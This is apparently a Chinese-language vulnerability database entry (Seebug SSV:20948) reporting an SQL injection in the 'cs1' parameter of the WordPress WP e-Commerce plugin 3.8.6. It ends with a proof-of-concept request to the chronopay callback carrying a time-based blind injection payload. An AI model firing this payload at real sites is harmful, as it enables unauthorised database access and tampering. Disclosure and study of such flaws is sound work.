WordPress WP e-Commerce插件"cs1"参数SQL注入漏洞

2011-09-23T00:00:00
ID SSV:20948
Type seebug
Reporter Root
Modified 2011-09-23T00:00:00

Description

BUGTRAQ ID: 49612

WordPress WP e-Commerce是基于WP和Web 2.0技术开发的一款电子商务购物车插件程序。

WordPress WP e-Commerce插件在"cs1"参数过滤用户数据时存在SQL注入漏洞,远程攻击者可利用此漏洞控制应用程序,访问或修改数据。

WordPress WP e-Commerce 3.8.6 厂商补丁:

WordPress

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://wordpress.org/

                                        
                                            
                                                http://www.example.com/?chronopay_callback=true
cs2=chronopay&cs1=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)%23&cs3=123f7bcd4ba53fade05886a7e77bf045&transaction_type=rebill